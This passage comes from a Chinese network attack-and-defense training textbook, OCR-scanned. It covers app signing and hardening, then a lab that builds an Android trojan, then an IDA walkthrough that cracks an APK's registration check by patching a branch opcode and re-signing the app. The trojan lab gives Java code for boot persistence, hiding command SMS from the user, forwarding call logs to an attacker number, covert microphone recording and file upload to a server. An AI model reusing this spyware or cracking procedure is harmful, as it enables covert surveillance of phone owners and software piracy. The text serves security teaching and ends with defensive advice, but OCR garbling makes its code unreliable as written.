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件 , 如 果 盗 版 者 对 其 进行 二 次 打包 时 没有 去 掉 验 证 代码 , 则 打包 生成 的 盗版 APP 在 运行 过 
程 中 就 会 自动 报警 ,被 安全 软件 识别 。 但 是 ,* 道 高 一 尺 , 魔 高 一 丈 " 的 道理 在 软件 盗版 领域 
显得 尤为 突出 ,如 果 盗 版 者 具有 较 强 的 逆向 分 析 水 平 ,能 够 找到 原 APP 的 数字 签名 代码 并 
移 除 或 屏蔽 ,就 可 以 避免 报警 。 为 此 ,要 较 好 地 解决 此 问题 ,单纯 从 软件 技术 上 是 无 法 实现 
的 ,目前 最 有 效 的 办 法 仍然 是 采用 验证 技术 ,将 安全 性 寄托 在 数字 签名 的 证 书 管理 上 ,通常 
可 通过 信誉 度 较 高 的 可 信 第 三 方 ( 如 知名 APP 安全 软件 商 ) 负 责 对 APP 进行 数字 签名 
验证 。 

2. 加 固 处 理 

应 用 加 固 是 近年 来 兴起 的 一 种 反 盗版 . 防 算 改 技术 ,其 基本 方法 是 先 将 正版 应 用 程序 进 
行 反 汇编 ,之 后 对 程序 的 汇编 代码 进行 加 密 和 混淆 处 理 ,然后 再 进行 重新 编译 打包 生成 应 用 
程序 ,同时 由 正版 作者 对 经 过 加 固 处 理 的 应 用 程序 重新 进行 签名 。 经 过 加 固 处 理 的 应 用 程 
序 ,虽然 理论 上 仍然 可 以 进行 反 汇编 ,但 由 于 程序 事先 经 过 了 加 密 处 理 , 因 此 反 汇 编 之 后 代 
码 的 可 读 性 将 大 大 降低 。 相 应 地 ,盗版 者 对 程序 进行 逆向 分 析 的 难度 也 大 大 增加 ,使 得 盗版 
者 通常 较 难 在 原 有 代码 中 植 和 恶意 代码 ,从 而 可 以 有 效 地 阻止 应 用 程序 被 二 次 打包 和 得 改 。 








7.2 Android 手机 木马 程序 设计 


7.2.1 预备 知识 : Android 木马 程序 设计 方法 


为 了 实现 对 正常 通信 的 接管 ,木马 程序 需要 在 Android 设备 开机 时 自动 运行 。 当 
Android 系统 启动 时 ,会 发 出 一 个 内 容 为 ACTION_BOOT_COMPLETED 的 系统 广播 ,其 
字符 串 常量 表示 为 android. intent. action. BOOT_COMPLETED。 为 此 ,在 编写 木马 程序 
时 ,需要 在 程序 中 能 够 “ 捕 提 ”到 这 条 消息 ,随即 启动 即 可 。 

木马 主要 通过 接收 短信 的 系统 接收 者 (broadcast receiver) 进 行 短信 内 容 匹 配 , 如 果 发 
送 的 是 控制 指令 , 则 将 短信 屏蔽 掉 , 让 被 控制 端 用 户 无 法 获得 接收 短信 的 通知 ,并 且 对 目标 
手机 进行 远程 控制 ,如 短信 转发 .电话 监听 、 手 机 录音 等 。 

木马 主要 利用 Android 中 的 广播 机 制 来 实现 控制 功能 。broadcast receiver 类 似 于 事件 
编程 中 的 监听 器 ,是 一 种 广播 消息 接收 器 。 木 马 重 写 了 опКесеіуе(Сопіехі context, Intent 
intent) 方 法 , 当 系 统 收 到 消息 时 ,通过 监听 android. provider. Telephony. SMS_RECEIVED 
广播 ,对 消息 的 内 容 进行 检测 。 当 检测 到 的 内 容 为 控制 指令 时 ,用 abortbroadcast() 将 短信 
屏蔽 掉 ,使 用 户 无 法 接收 到 短信 ,然后 根据 控制 指令 进行 相应 操作 。 

需要 注意 的 是 ,如 果 数 据 量 比较 大 (如 录音 、 摄 像 数 据 等 ) ,为 便于 实验 的 进行 ,可 架设 一 
人 台 服 务 器 上 传 数据 。 


7.2.2 实验 目的 和 条 件 





i 








1. 实验 目的 
通过 本 实验 ,使 读者 学 习 并 掌握 以 下 内 容 。 
CD 基于 Android 木马 程序 的 运行 机 制 。 
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(2) 编写 Android 木马 程序 ,通过 指令 实现 对 智能 手机 的 行为 控制 。 

(3) 掌握 相关 工具 的 使 用 方法 。 

2. 实验 条 件 

本 实验 可 以 在 Windows 7 及 以 上 操作 系统 上 进行 ,在 具体 进行 实验 之 前 ,需要 事先 构 
建 相应 的 实验 环境 。 


7.2.3 实验 过 程 


步骤 1: 木马 自 启动 功能 的 实现 。 首 先 在 Main Activity 的 onCreate 方法 中 创建 一 个 
TextView 来 实现 程序 自动 启动 ,代码 如 下 。 


Protected vdid onCreate(Bundle savedInstanceState)( 
super. onCreate(saveldlnstanceState); 
setContentView(R. layout. activity main); 


TextVlew tv = new TextView(this); 
tv. setText("Hello.I Started!") 
this. setContentView(tv); 

) 


通过 继承 BroadcastReceiver 类 ,来 实现 一 个 接收 广播 消息 的 类 BootBroadcastReceiver, iÑ 
过 覆盖 onReceive 方法 ,检测 接收 到 的 Intent 是 否 符合 BOOT_COMPLETED, 如果 符 合 ， 
则 启动 MainActivity 中 的 Activity。 在 木马 程序 中 ,一 般 要 自动 运行 的 不 是 界面 中 的 程序 ， 
而 是 在 后 台 运 行 的 服务 (service) 。 此 时 ,就 需要 用 startService 来 启动 相应 的 service。 代 码 
如 下 。 


public class BootBroadcastReceiver extends BroadcastReceive{ 


(QOverride 
public void onReceive(Context context, Intent intent) ( 
final String ACTION - "android. intent. action. BOOT COMPLETED"; 
if(intent.getAction(). equals(ACTION))( 
Intent sayHellolntent - new Intent(context, MainActivity.class); 
sayHellolntent.addFlags(Intent. FLAG ACTIVITY NEW TASK); 
cnntext. startActivity(sayHellolntent); 
j; 
} 
) 


步骤 2: 短信 自动 转发 。 同 样 继承 BroadcastReceiver 25, 
public class SmsReceiver extends BroadcastReceiver{ 
private final String TRC = "SmsReceiver"; 


private static final String mACTION = "android. provider. Telephony.SMS RECEIVED"; 


(@0уеггіае 
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public void onReceive(Context context, Intent intent) { 
if (intent. getAction().equals( mACTION))( 





Object[] pdus = (Object[ ]) intent.getExtras().get("pdus"); 
if (pdus!- null && pdus. length» 0)( 
SmsMessage[ ] message = new SmsMessage[ pdus. length]; 
for(int і = 0;i« pdus. length; і++) { 
byte[] pdu = (byte[ ]pdus[ i]); 
message[ i] = SmsMessage. createFromPdu ( pdu) ; 
) 
MessageHandler. serdMessage (message) ; 


步骤 3: 电话 监听 。 同 样 继承 BroadcastReceiver 类 ,包含 接 电 话 和 打 电 话 。 


public class CallHoldRecelver extends BroadcastReceiver{ 
private final static String mACTION = "android. intent.action. PHONE sTATE"; 


(QOverride 
public void onReceive(Context context, Intent intent)( 


if(intent.getAction(). equals( mACTION) ( 
Date date = new Date() ; 
date. setTime(System. currentTimeMillis()); 
SimpleDateFormat format = new SimpleDateFormat( 
"Уууу — MM. dd HH:mm:ss"); 
StringBuilder smsCont = new StringBuilder(); 
snsCont. append( format. format(date)); 
snsCont. append(" —— "); 
snsCont. append( intent.getExtras().getString(" incoming number")); 
snsCont. append(" —— "); 
snsCont. append( "callee"); 
smsCont. append( intent. getExtras().getString("incoming number")); 
MessageHandler. send (MainActivity. PHONENO . smsCont. toString()): 


) 
public class DialReceiver extends BroadcastReceiver( 
private static final String mACTION - "android. intent.action. NEW OUTGOING CALL"; 


(QOverride 
public void onReceive(Contexc context, Intent Intent)( 
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if (intent. getAction(). equals( mACTION)( 
Date date = new Date() ; 
date. setTime(System. currentTimeMillis()); 
SimpleDateFormat format - new SimpleDateFormat( 
"Уууу - MM- dd HH:mm:ss"); 
StringBuilder smsCont = new StringBuilder(); 
sm sCont. append( format. format(date)); 
snsCont. append(" —— "); 
smsCont. append(intent.getStringExtra(Intent. EXTRA PHONE NUMBER)); 
SnsCont. append(" —— "); 
SnsCont. append("call to"); 
smsCont. append(intent.getStringExtra(Intent. EXTRA PHONE NUMBER)); 
MessageHandler. send(MainActivity. PHONENO, smsCont. toString()); 


步骤 4: 电话 录音 。 当 系统 收 到 消息 时 ,通过 监听 android. provider. Telephony. SMS _ 
RECEIVED 广播 , 对 消息 的 内 容 进行 检测 。 当 检测 到 的 内 容 为 录音 指令 时 ,用 
abortbroadcast() 将 短信 屏蔽 ,使 用 户 无 法 接收 到 短信 ,然后 创建 一 个 android 和 白带 的 
MeidaRecorder 对 象 进行 录音 ,利用 计时 函数 CountDownTimer 进行 计时 ,覆盖 onFinish() 
和 onTick() 方 法 ,实现 计时 30 秒 的 操作 。 








private void initializeAudio( ){ 
recorder = new MediaRecorder() 
recorder. setAudioSource(MediaRecorder. AudioSource. MIC) ; 
recorder. setOutputFormat(MediaRecorder. OutputFormat. RAW АМК); 
recorder. setAudioEncoder(MediaRecorder. AudioEncoder. АМЕ NB); 
recorder. setOutputFile("/sdcard/test. amr"); 


try( 
recorder. ргераге(); 
recorder. start(); 

}catch (lllegalStateException e)( 
e. printStackTrace(); 

)catch (10Exception е){ 
e. printStackTrace(); 

) 

Í 


步骤 5: 文件 转发 上 传 。 主 要 代码 如 下 。 


try{ 

Data0utputStream dos = new Data0utputStream( 
httpURLConnection. getOutputStream()); 

dos. writeBytes(twoHyphens + boundary + end) ; 

dos. writeBytes("Content - Disposition:form- data; 


со 
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name = \"file\"; filename=\""+ 

filename. substring(filename.lastlndexOf("/") +1) + "V" + end); 
dos. writeBytes(end); 

FilelnputStream fis - new FilelnputStream(filename); 
byte[] buffer = new byte[8192]; //8k 

int count = 0; 

while( (count = fis.read(buffer))!- - 1)( 

dos. write(buffer, 0,count); 

) 

fis.close(); 

dos. writeBytes(end); 

dos. writeBytes(twoHyphens * boundary * twoHyphens * end) ; 
dos. flush(); 

InputStream is = httpURLConnection. getlnputStream(); 
InputStreamReader isr = new InputStreamReader( is, "utf — 8"); 
BufferedReader br = new BufferedReader(isr); 

String result = br. reactLine(); 

Systen. out. println(result); 

//Toast. makeText(this, result, 

Toast.LENGTH LONG).show(); 

dos. close(); 

is.close(); 

]catch(Exception e)( 

Systen. our. println(" 未 找到 录音 文件 "); 

H 


木马 程序 应 该 静默 运行 ,为 调试 方便 和 演示 效果 ,在 程序 开 
始 运行 时 需要 用 户 设 定 监 听 结 果 转 发 的 手机 号 码 , 结 果 如 图 7-6 
所 示 。 


7.2.4 任务 与 思 


针对 Android 手机 木马 程序 的 攻击 ,可 以 通过 以 下 几 个 方面 
加 强 安全 管理 。 

(1) 不 随意 单 击 不 明 链接 ,由 于 绝 大 多 数 木 马 程序 是 通过 
QQ 或 微 信 等 方式 发 送 链接 ,在 用 户 收 到 不 明 链 接 或 网 上 购物 时 ， 

(2) 平时 养 成 关闭 Wi-Fi 或 蓝牙 功能 的 习惯 ,一 方面 防止 攻 才 
或 蓝牙 对 手机 进行 攻击 并 窃取 信息 ; 另 一 方面 可 有 效 节 约 电能 ， 
施 定位 。 








Ш 7-6 设 定 监听 结果 转发 
的 手机 号 码 


- 定 要 验证 发 送 者 信息 的 





行者 在 公共 场所 通过 Wi-Fi 
并 可 以 预防 通过 Wi-Fi 实 





(3) 及 时 备份 手机 等 移动 终端 中 的 数据 ,尤其 是 一 些 敏感 数据 ,以 防止 手机 因 攻 击 导致 


无 法 正常 工作 ,需要 初始 化 时 不 至 于 丢失 数据 。 














(4) 从 运营 商 、 专 业 供应 商 或 信誉 度 高 的 手机 软件 商店 处 更 新 软件 固件 ,避免 到 一 些 不 


明 身 份 的 第 三 方 站 点 下 载 和 安装 固件 。 
(5) 为 手机 设置 流量 提醒 功能 ,避免 手机 不 幸 感染 病毒 或 恶 











意 软件 后 台 偷 偷 联网 造成 
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资费 消耗 。 
(6) 不 要 随意 用 手机 扫 二 维 码 ,二 维 码 已 经 成 为 恶意 程序 新 的 传播 途径 。 
(7) 从 安全 信誉 高 的 站 点 下 载 应 用 程序 。 


7.3 IDA 破解 实例 


7.3.1 预备 知识 : 逆向 工程 分 析 法 


逆向 工程 最 早 来 源 于 硬件 领域 ,主要 是 检查 硬件 开发 过 程 中 是 否 遵循 相关 的 规约 ,同时 
用 于 研究 他 人 的 系统 ,发 现 其 工作 原理 ,以 达到 复制 和 再 利用 的 目的 。 目 前 ,逆向 工程 已 经 
被 引入 计算 机 领域 ,如 在 软件 工程 中 ,逆向 工程 可 用 于 研究 目标 系统 的 工作 原理 。 

逆向 工程 作为 一 个 新 兴 的 领域 ,在 软件 维护 中 有 着 重要 的 作用 。 充 分 利用 逆向 工程 技 
术 就 可 以 对 现 有 系统 进行 改造 ,减少 开发 强度 ,提高 软件 开发 效率 ,降低 项 目 开发 的 经 济 成 
本 ,提高 经 济 效益 ,并 在 一 定 程度 上 保证 软件 开发 和 利用 的 延续 性 。 

逆向 工程 也 是 信息 安全 技术 的 重要 组 成 部 分 。 通 过 逆向 工程 ,攻击 者 可 以 分 析 软 件 的 
目标 码 ,理解 程序 的 结构 和 程序 的 逻辑 ,甚至 可 以 改变 一 个 程序 的 结构 ,从 而 可 以 直接 影响 
程序 的 逻辑 流 。 例 如 ,软件 打 补 丁 (patching) 便 是 一 种 针对 逆向 工程 的 应 用 , 打 补丁 允 许 在 
没有 源码 的 情况 下 ,添加 命令 或 改变 特殊 函数 调用 的 方式 ,这 使 得 软件 分 析 者 能 够 给 目标 程 
序 添加 秘密 特性 、 删 除 函 数 或 禁用 函数 、 在 没有 源码 的 情况 下 定位 错误 等 。 

基于 逆向 工程 的 软件 漏洞 挖掘 技术 的 研究 路 线 是 将 要 分 析 的 二 进 制 代码 首先 反 汇编 ， 
得 到 汇编 代码 ; 然后 对 汇编 代码 进行 切片 , 即 对 某 些 上 下 文 关联 密切 、 有 意义 的 代码 进行 汇 
聚 ,以 降低 其 复杂 性 ; 最 后 通过 分 析 功 能 模块 ,来 判断 是 否 存 在 漏洞 。 在 网 络 攻 防 过 程 中 ， 
当 发 现 漏洞 后 ,就 可 以 根据 漏洞 产生 的 根源 开发 相应 的 渗透 工具 。 

按照 是 否 采用 反 汇 编 和 反 编译 得 到 其 高 级 语言 表述 的 代码 ,可 以 将 逆向 工程 的 方法 分 
为 白 箱 分 析 法 和 黑箱 分 析 法 。 其 中 , 白 箱 分 析 法 主要 是 对 源 代码 进行 分 析 和 理解 。 对 于 所 
需 分 析 的 二 进 制 代码 采用 反 汇 编 、 反 编译 的 方法 ,得 到 其 高 级 语言 形式 的 源 代码 ,并 进一步 
分 析 此 源 代码 。 如 果 有 功能 优秀 的 反 编译 工具 的 支持 , 白 箱 测 试 对 于 发 现 软 件 中 设计 错误 
和 执行 错误 是 非常 有 效 的 。 然 而 白 箱 测试 也 有 不 足 之 处 ,就 是 编译 后 产生 的 代码 和 其 真正 
的 源 代码 可 能 会 存在 差异 ,因此 可 能 会 误 报 实际 上 不 存在 的 漏洞 。 

黑箱 分 析 法 就 是 利用 各 种 输入 对 程序 进行 探测 ,并 对 程序 运行 的 结果 进行 分 析 。 这 种 
分 析 方 法 仅 需 要 有 运行 的 程序 而 不 需要 分 析 任 何 形式 的 源 代码 。 其 测试 条 件 是 可 运行 的 程 
序 、 能 接受 输入 及 可 以 观察 到 结果 。 如 果 测 试 者 能 给 运行 的 程序 提供 输入 ,并 可 以 观察 输出 
结果 ,就 可 以 进行 黑箱 测试 。 在 黑箱 测试 时 ,可 以 尽量 给 程序 提供 各 种 恶意 输入 向 量 , 如 果 
用 某 个 特定 的 测试 向 量 测试 程序 时 程序 出 现 异 常 , 就 预示 着 可 能 发 现 了 该 程序 的 一 个 漏洞 。 
相对 于 白 箱 测试 ,黑箱 测试 在 理解 代码 逻辑 和 程序 行为 等 方面 不 是 那么 有 效 , 而 且 黑 箱 测试 
需要 软件 分 析 者 具有 更 多 的 经 验 。 不 过 黑箱 测试 不 需要 反 汇 编 ` 反 编译 等 工具 的 支持 ,更 容 

IDA Interactive Disassembler, 交 互 式 反 汇 编 器 ) 是 一 款 成 熟 的 交互 式 反 汇编 工具 , 主 
要 用 于 反 汇 编 和 动态 调试 。IDA 支持 对 多 种 处 理 器 的 不 同类 型 可 执行 模块 进行 反 汇编 处 

















260 网 络 攻击 与 防御 实 训 





理 , 具 有 方便 直观 的 操作 界面 ,可 以 为 用 户 呈 现 尽 可 能 接近 源 代 码 的 代码 ,减少 了 反 汇 编 工 
作 的 难度 ,提高 了 效率 。IDA 提供 了 较 好 的 分 析 技 术 , 它 具有 更 好 的 反 汇编 .深层 分 析 和 保 
存 静 态 汇编 等 优点 ,同时 ,利用 ТРА 可 以 观察 到 jmp 命令 的 具体 跳 转 位 置 。 为 此 ,IDA 非常 
适合 于 恶意 代码 分 析 、 漏 洞 研究 、 隐 私 保护 和 其 他 学 术 研究 。 


7.3.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 在 学 习 逆向 工程 分 析 方 法 的 基础 上 ,熟悉 静态 分 析 中 所 需要 的 关键 
知识 点 ,通过 具体 操作 了 解 IDA. 工具 的 功能 及 使 用 方法 。 

2. 实验 条 件 

本 实验 可 以 在 Windows 7 操作 系统 上 通过 相关 的 工具 软件 来 实现 ,所 需要 的 主要 软件 
如 下 。 


(1) IDA。 本 实验 使 用 IDA pro v6. 8. 
(2) WinRAR, 


G) 静态 反 编 译 工具 C32 ASM。 本 实验 使 用 C32 ASM v1.0. 9.0. 
(4) Android 3 [5] B] v2. 2。 


7.3.3 实验 过 程 


首先 ,安装 实验 条 件 中 提 到 的 应 用 程序 。 其 中 ,在 安装 Android 逆向 助手 的 过 程 中 ,使 
用 jd-gui 阅读 java 代码 , 当 出 现 如 图 7-7 所 示 的 对 话 框 时 ,选中 “dex 转 jar" HE PHIL. 











Ф Android 送 向 助手 v2.2 一 X 
选择 : 
源 文件 : D: \test\crackme0502. apk 























目标 文件 : [D VtestVeracjme0502_dex2jar jar 





RR ууна uA 

ET 

Оваа O 重 打包 spk OX&e Отан Of OH 
Ова О imas О ааа O dex 转 txt 图 аја O jar 转 dex 
OBCDHdt Ot Оза Озю 


日 志 : 





: D:\test\erackne0502. apk 
目标 : D:\test\erackme0502_dex2jar. jar 
在 打开 
lex2jer version: translator-0.0.9.15 
lex? jar D: VtestlerackneOS02. apk -> D: \test\orackme0502_dex2jar. jar 


打开 成 功 








7-7 选择 Android 逆向 助手 的 反 编译 方式 


步骤 1: 开始 使 用 IDA 分 析 。 将 要 分 析 文 件 的 扩展 名 由 арк 修改 为 zip。 然 后 解压 缩 
包 , 得 到 它 的 classes. dex 文件 ,再 将 classes. dex 文件 导入 IDA 中 ,操作 界面 如 图 7-8 
所 示 。 
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[Ele Edit Jump Search View Debugger Options Window: Help 
mi #-=»- man 8 + c ZQ йй #-#шХ 00 




















Librery function B Data MD Regular function MB Vnerplored HB Tastruction B Ixterndl. sysbol 
теш inde D 8 х | [E m vix B perve т Twas 
































Function name 
AccessibilayServicelnioCompat Ж у 1 
AcessibiityServicelnfoCompat: Copyright (c) 2015 Hex-Rays, «supportGhex-rays.ci 1 
AosssilbiglayorvkoskdoCompsi] License info: 48-3255-7514-28 I 
AccessibilityServicelnfoCompat: Giancarlo Russo, HT Srl 1 





ActessibiityServicelnfoCompat: 
AccessibiliyServicelnfoCompat 

























2F945615C0E809E96F737FB898F783AI 
3BF59061 


8 Input MD5 
# Input CRC32 


DEX Module, Interface uersion 7 
Input Dex File version 35 





Acci se ceo comet 

AccessibilityServicelnfoCompat. 

AccessibilityServicelnfoCompat 

AccessibiiyServicelnfoCompat t BYTES: COLLAPSED SEGMENT HEADER. PRESS CTRL-NUMPAD TO EXPAND] 
AccessibilityServicelnfoCompat. String ids 


AccessibilityServicelnfoCompat. 
AccessibiityServicelnfoCompat, 
AccessibiityServicelnfoCompat, 
AccessibiityServicelnfoCompat, 
AccessibiityServicelnfoCompati 
AccessibiityServicelnfoCompati 
AccessibiityServicelnfoCompati 
AccessibiityServicelnfoCompati 
ActessibiityServicelnfoCompati 
AccessibiityServicelnfoCompati 






€ 70: t unk 2F9FC, unk 2F9FE, unk 2F001, unk_2F00S, unk_2FA98 
M DATA XREF: HEADER: 0000003CTo 
N MAP ;000AF3BCLO 
Unk 2FR27, unk_2FANF , unk_2FASF, unk_2FAB2 
Unk 2FRB9, unk_2FADA, unk 2FRF2, unk_2FB19 
t шпк_2ЕВ®1, unk 2F062, unk 2FDóR, ипк 2FD87, unk 2FDRA 


























图 7-8 IDA 操作 界面 
步骤 2: 切换 到 exports 选项 卡 ,输入 "mainactivity”, 找 到 第 二 个 onclick 函数 ,也 就 是 
对 应 的 MainActivity $ 2. onClick@VL, 如 图 7-9 所 示 。 


Jump Sea Options р 
E e-9-Us A + o ШО à=. x > 00 








* [=]: an ü 
I HII Е ПИТ Ш |. — — b а ЩЩ 


| Library function [S Data B Regular function ËB Unexplored Bl Instruction M External symbol 



































[7] Functions window пех Enuns Kf Imports) 
Function name а Address Ordinal 
[Z] AccessibiityServicelnfocompat: Ñ| @ 0002CE64 2578 
[Z] AccessibilityServicelnfoCompat' Г: 0002CE90 2579 
[Z] AccessibilityServicelnfoCompat' || (21 SimpleCursorAdaptergetCursorToStringConverter@L 0002CED8 2581 
[Z] AccessibilityServicelnfoCompat' || 国 SimpleCursorAdaptergetStringConversionColumn@I 0002CEFO 2582 
[Z] AccessibilityServicelnfoCompat' SimpleCursorAdaptergetViewBinder@L 0002CF08 2583 
ibilityServi SimpleCursorAdaptersetCursorToStringConverter VL 0002CF20 2584 
SimpleCursorAdaptersetStringConversionColumnQ VI O002CF38 2585 
27 SimpleCursorAdaptersetViewBinder& VL 0002CF50 2586 
$| SimpleCursorAdaptersetViewimage@VLL 0002CF68 2587 
SimpleCursorAdaptersetViewText@VLL 0002CFAC 2588 
if] SimpleCursorAdapterswapCursorQLL 0002CFC4 2589 
2] MyAnno. <init>@V 0002CFE8 2968 
MyAnno.outputinfo@V 00020000 2969 
if] BuildConfig. «init» QV 00020020 2974 
£f] MainActivity$1.<init=@VL 0002D038 2975 
MainActivity$ LonClickVL 00020054 
00020070 
0002004 
00020114 2980 
0002018 2981 
00020210 2982 
00020228 2983 
00020240 2985 
0002037 2987 




















图 7-9 找到 MainActivity $ 2. onClick@ VL 


步骤 3: 双击 MainActivity $ 2. onClick@ VL 函数 进入 操作 界面 ,如 

步骤 4: 按 Space 键 切换 到 IDA 的 流程 视图 ,如 图 7-11 所 示 。 

在 图 7-11 中 ,读者 可 以 清楚 地 看 到 代码 的 关键 点 就 是 if-eqz v2 和 loc_2D0DC, 其 中 左 
侧 箭头 表示 条 件 不 满足 时 执行 的 路 线 , 右 侧 的 箭头 表示 条 件 满 足 时 执行 的 路 线 。 





7-10 所 示 。 
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TUUUZUUSU тте HH 
° 90992088C new-instance v8, <t: MainActivity$SNChecker> 
° ввв2рвов iget-object v2, this, Hainfctivity$2 this$0 
° 0002D095 iget-object v3, this, Mainñctiuitu$2_this$0 
° 909020898 invoke-static 403}, <ref Mainhctivity-accessS1(ref) Maj 
四 89882009E moue-result-object v3 
° 8802D 808 invoke-virtual (v3), «ref EditText.getText() imp. Ө dei| 
° ввав2рвйб moue-result-object va 
° ввв2рвав invoke-interface (v3), «ref Editable.toString() inp. G di 
x 96020 RE nove-result-object va 
Ы 06020088 invoke-direct (v8, v2, v3), «void Hainfctivity$SNCheck: 
8862D8Bó .local name:'checker' type:'Lcom/droider/crackne8582/Hainüctivity$SNChecker ; 
020086 checker = 
99920086 „line 45 
s вва2рввб invoke-virtual (checker), «boolean Hainctivity$SNCheck: 
° 9802D 8BC move-result v2 
s 82D ВВЕ if-eqz v2, loc 2D6DC 
. ввв2рвс2 const-string vi, aCIxjncabcngcbo "ú wise 5 
0002006 
0002D8C6 loc_2D0C6: # CODE XREF: Mainñctiuitu$2_onClick@UL+S8Lj 
82D6C6 .local name:'str' type:'Ljava/1ang/String;' 
0002D0C6 str = vi 
96020 0C6 Ліпе 46 
° ввв2рвсб iget-object v2, this, Mainñctiuitu$2_tnis$0 
=i 02D 8Ch const/A v3, 0 
ч 8992DBCC invoke-static 402, str, v3), <ref Toast.makeText(ref, i| 
° 99920002 move-result-object v2 
B 00020004 invoke-virtual (v2), «void Toast.show() imp. G def Toa: 
0020 6DA 














图 7-10  MainActivity $ 2. onClick(2 VL 函数 操作 界面 























urce file: Mainactivity.java 
public void com.dri се ackne DS 2 . Mainhctivity$2.onClick( 








|neu-instance 9%, «t: Mainactivity$SMChecker? 
1get-object v2, this, Mainactivity$2 thi: 
v3, this, Mainhctivity$2 this$0 

(03), <ref Mainüctivity.access$1(ref) Mainactivity access$TaLL» 
v3 





(V3), <ref EditText.getText() imp. 8 def EditText дестехиа > 
va 


Gn, crer Editable.toString() imp. @ _def Editable_toString@l> 





o v2, өзу, Xvold Mainactivity$SHChecker.Cinit(ref, ref) MainactivityfsMChecker init QULL) 
al name:'checker" type: 'Lconm/droider/crackmeMS02/Mainhct ivi ty$SNChecker ; " 
|checker = 0 















(checker), «baolean Mainactivity$SNChecker .isRegistered() Mainactivuitu$sMChecker_isRegisteredm2> 





„2 
92, loc 200C 





Vi, atixjmcabengcba š MEL 






оН" 


vi, aCIxjncabsFsspp 
loc 20806 












а 
nst-string 
to 





thod End 


10c_2Đ0c6: 
4l mame:'str' type:'Ljava/lang/String;" 


v2, this, Mainactivity$2 this$a 
vo, 0 


(v2, str, v3), «ref Teast.makeText(reF, ref, int) imp. G def Toast makeTextGLLLID| 
v2 


(2), «void Teast.shew() imp. G def Toast showa 











|return-void 
图 7-11 IDA 流程 图 


步骤 5: 虽然 不 知道 乱码 代表 的 具体 内 容 , 但 通过 直接 修改 if-eqz 即 可 破解 该 程序 。 具 
体 方法 为 : ыа if-eqz 上 , 单 击 Hex View-1 标签 ,切换 到 十 六 进 制 处 ,其 相应 的 字 
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节 码 是 “38 02 ОЕ 00”, 所 对 应 的 地 址 是 “0002DOBE”, 如 图 7-12 所 示 。 


Бе Edit Jump Search View Debugger Options Windows Help 
SH ar "sp % 4 < DOl dtt ty ub X р D Opus abe т) | 


























Library function B Data Regular function Unexplored Instruction HD External symbol 


[F] Functions window nex IDA Viera [3 | Нех View! | [Ж] Structures | 

2 || B002D07E 62 NA 63 вө G8 йй 32 оғ A4 вв 2B AN во вв 
— ry |8002D08E he 01 54 42 C9 02 54 43 C9 02 71 10 А7 08 
AccessibilityServiceInfoCom вв82089Е ӨС 63 óE 10 51 8B 03 ƏƏ QC 03 72 10 1E Dñ 
iyServiceinfoCompat |ggg»pgar вс 03 70 38 аз BB 83 óE 18 A4 BB ве өв 
ityServicelnfoCompat |gggopgpr 18 81 55 ВЕ 54 42 C9 82 12 83 

















Function name 












AccessibilityservicelnfoCompat: |lgggopgcE 96 8B 12 03 BC 82 6E 10 97 ӨВ 82 00 ВЕ 00 
AccessibiliyervicelnfoCompat: ||ово2рәр= 56 0E 28 ЕЗ 00 00 03 00 63 00 61 00 во 00 
AccessibiliyServicelnfoCompat' |lgggopgrt ву вв вв 08 80 00 5B 81 СВ 62 70 18 EF 0B 
AccessibilityServicelnfoCompat: |ggg2pgrE 5B 82 са 82 BE ве вв ов от 08 62 вв во вв 











AccessibilityServicelnfoCompat: 








图 7-12 十 六 进 制 方式 显示 


步骤 6: 将 classes. dex 文 件 放 入 C32 ASM 中 ,以 十 六 进 制 打开 ,并 跳 转 到 0002DOBE。 
随后 将 38 修改 为 39 后 保存 ,如 图 7-13 所 示 。 













IË 文件 (E) НАКЕ) WRO FEV IAT) SRA) SOW) MAH) 
lid | am e > 3, 2 2 2 | @ g ë OO 
il Enjoy G2asm @# (heodassesdex| 























6E 40 97 


图 7-13 将 38 修改 为 39 


步骤 7: 保存 后 , 需 对 该 DEX 文件 进行 重新 校 验 ,仍然 使 用 DexFixer 工具 ,将 该 
classes. dex Ж { @ А DexFixer 窗口 中 ,如 图 7-14 所 示 。 








2012/11/12 19:49 
2018/2/27 18:08 





ЖЕЕ BRYDEXSZ PELA 
正在 验证 DB 文件 .… 
DEX 文 件 标志 验证 通 : 


DEX 文 件 SHA1 验 证 失败 
DB 文件 SHA1 值 已 修正 
87 8D OF BA 9E 2A B8 68 5C C2 0D 2F F6 A0 1E 51 59 D3 EB 58 






































图 7-14 使 用 DexFixer 工具 对 DEX 文件 进行 重新 校 验 
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步骤 8; 将 修复 好 的 classes. dex 文件 复制 到 原先 的 文件 夹 中 ,并 删除 之 前 的 签名 文件 
3€ META-INF ,然后 选择 所 有 文件 夹 并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “添加 到 压缩 文件 ” 
选项 ,如 图 7-15 所 示 。 





1> WBR > 本 地 碰 盘 (D) > test > crackme0502 








名 称 修改 日 期 mm 
+ Ш = 2018/2/27 18:0 SHA 
^ È AndroidManifestaml | ад Editplus 
Й 0 dasses.dex @ UhraEdit 
| ] resources.arsc 2 
š 添加 到 压缩 文件 (A)-- 
38 али! *cractme0502.rar"(T) 
B EER E-mail... 
В 使 用 360 解 除 占用 





38 ти 'crackme0502.rar 并 E-mail 














图 7-15 对 文件 进行 压缩 操作 


步骤 9: 在 打开 的 如 图 7-16 所 示 的 对 话 框 中 ,设置 “压缩 文件 格式 ?为 ZIP 格式 ,然后 开 
始 压 缩 。 
























































B gaxeczusm ? x 
яя RR Gn 文件 % 。 时间 iW 
压缩 文件 名 (A) |)... 
crackme0502. zip v 
Num 更 新 方式 (UV) 
RAC)... ЖИНАУ s 
压缩 文件 格式 压缩 选项 
Оюк Ою Фен фын ен инн) 
格式 压缩 文件 (X) 
ERARO J _ 创建 固 实 压缩 文件 (5) 
[标准 E 添加 恢复 记录 (》 
жаңа) жї (r) 
lom v BEERZEL) 
192590), 大 小 
v] + 设置 六 本 四 
[ = |] 








图 7-16 选择 ZIP 压缩 文件 格式 


步骤 10: 将 压缩 后 的 文件 后 级. zip 修改 为 . apk。 然 后 打开 Android 道 向 助手 ,对 该 
APK 文件 重新 签名 ,得 到 crackme0502_sign. apk 文件 ,如 图 7-17 所 示 。 

步骤 11: 安装 重新 签名 后 的 APK 文件 。 需 要 说 明 的 是 ,在 安装 该 АРК 文件 之 前 , 需 
要 将 原先 的 APK 文件 (本 例 为 crackme0502. apk) 印 载 才 能 正确 安装 ,如 图 7-18 所 示 。 

步骤 12: 在 原来 的 АРК 文件 卸载 完成 后 ,安装 经 逆向 助手 处 理 后 的 APK 文件 ,如 
